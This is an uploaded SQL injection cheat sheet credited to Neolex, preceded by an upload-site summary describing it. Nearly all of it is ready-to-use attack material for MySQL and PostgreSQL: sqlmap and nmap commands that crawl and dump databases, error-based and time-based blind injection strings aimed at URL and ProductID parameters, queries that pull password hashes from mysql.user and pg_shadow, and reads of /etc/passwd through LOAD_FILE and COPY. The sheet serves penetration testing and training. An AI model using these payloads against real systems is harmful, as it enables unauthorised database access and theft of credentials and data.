Neolex Injection-Sql

The document is a SQL Injection Cheat Sheet by Neolex, providing various SQL commands and techniques for MySQL and PostgreSQL databases. It includes commands for user management, database information retrieval, and methods for exploiting SQL injection vulnerabilities. The cheat sheet is intended for security professionals and developers to understand and mitigate SQL injection risks.

Uploaded by

melpomene5
Injection SQL Cheat Sheet

by Neolex via cheatography.com/32330/cs/9949/

Automated tools

SQLMAP                        sqlmap -u "url" --forms --batch --crawl=10 --level=5 --risk=3
NMAP                          nmap -p80 --script=http-sql-injection --script-args=httpspider.maxpagecount=200 <target>

Mysql

Version                       SELECT @@version;
Comments                      /* */ or #
Current user                  SELECT user(); || SELECT system_user()
List users                    SELECT user FROM mysql.user;
List password hashes          SELECT host, user, password FROM mysql.user;
Current database              SELECT database()
List databases                SELECT schema_name FROM information_schema.schemata; || SELECT distinct(db) FROM mysql.db
List tables                   SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != 'mysql' AND table_schema != 'information_schema'
List columns                  SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema'
Find Tables From Column Name  SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = 'username';
Time delay                    SELECT BENCHMARK(1000000,MD5('A'));
                              SELECT SLEEP(5); # >= 5.0.12
Local File Access             …' UNION ALL SELECT LOAD_FILE('/etc/passwd') --
Hostname/IP Address           SELECT @@hostname;
Create user                   CREATE USER test1 IDENTIFIED BY 'pass1'; --
Delete user                   DROP USER test1; --
Location of the db file       SELECT @@datadir;

SQLMAP

sqlmap -u "url" --dbs
sqlmap -u "url" --tables -D [database]
sqlmap -u "url" --columns -D [database] -T [table]
sqlmap -u "url" --dump -D [database] -T [table]

Manually Attack

Quick detect INTEGERS         select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
Quick detect STRINGS          '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
Clear SQL Test                product.php?id=4
                              product.php?id=5-1
                              product.php?id=4 OR 1=1
                              product.php?id=-1 OR 17-7=10
Blind SQL Injection           SLEEP(25)--
                              SELECT BENCHMARK(1000000,MD5('A'));
Real world sample             ProductID=1 OR SLEEP(25)=0 LIMIT 1--
                              ProductID=1) OR SLEEP(25)=0 LIMIT 1--
                              ProductID=1' OR SLEEP(25)=0 LIMIT 1--
                              ProductID=1') OR SLEEP(25)=0 LIMIT 1--
                              ProductID=1)) OR SLEEP(25)=0 LIMIT 1--
                              ProductID=SELECT SLEEP(25)--

By Neolex (cheatography.com/neolex/, neol3x.wordpress.com). Published 23rd November, 2016. Last updated 23rd November, 2016.
PostgreSQL

Version                       SELECT version()
Comments                      --comment | /* comment */
Current user                  SELECT user; SELECT current_user; SELECT session_user; SELECT usename FROM pg_user; SELECT getpgusername();
List users                    SELECT usename FROM pg_user
List DBA Accounts             SELECT usename FROM pg_user WHERE usesuper IS TRUE
List password hashes          SELECT usename, passwd FROM pg_shadow -- priv
Current database              SELECT current_database()
List databases                SELECT datname FROM pg_database
List tables                   SELECT c.relname FROM pg_catalog.pg_class c LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace WHERE c.relkind IN ('r','') AND n.nspname NOT IN ('pg_catalog', 'pg_toast') AND pg_catalog.pg_table_is_visible(c.oid)
List columns                  SELECT relname, A.attname FROM pg_class C, pg_namespace N, pg_attribute A, pg_type T WHERE (C.relkind='r') AND (N.oid=C.relnamespace) AND (A.attrelid=C.oid) AND (A.atttypid=T.oid) AND (A.attnum>0) AND (NOT A.attisdropped) AND (N.nspname ILIKE 'public')
Find Tables From Column Name  SELECT DISTINCT relname FROM pg_class C, pg_namespace N, pg_attribute A, pg_type T WHERE (C.relkind='r') AND (N.oid=C.relnamespace) AND (A.attrelid=C.oid) AND (A.atttypid=T.oid) AND (A.attnum>0) AND (NOT A.attisdropped) AND (N.nspname ILIKE 'public') AND attname LIKE '%password%';
Time delay                    SELECT pg_sleep(10);
Local File Access             CREATE TABLE mydata(t text); COPY mydata FROM '/etc/passwd';
Hostname/IP Address           SELECT inet_server_addr();
Port                          SELECT inet_server_port();
Create user                   CREATE USER test1 PASSWORD 'pass1' CREATEUSER
Delete user                   DROP USER test1;
Location of the db file       SELECT current_setting('data_directory');
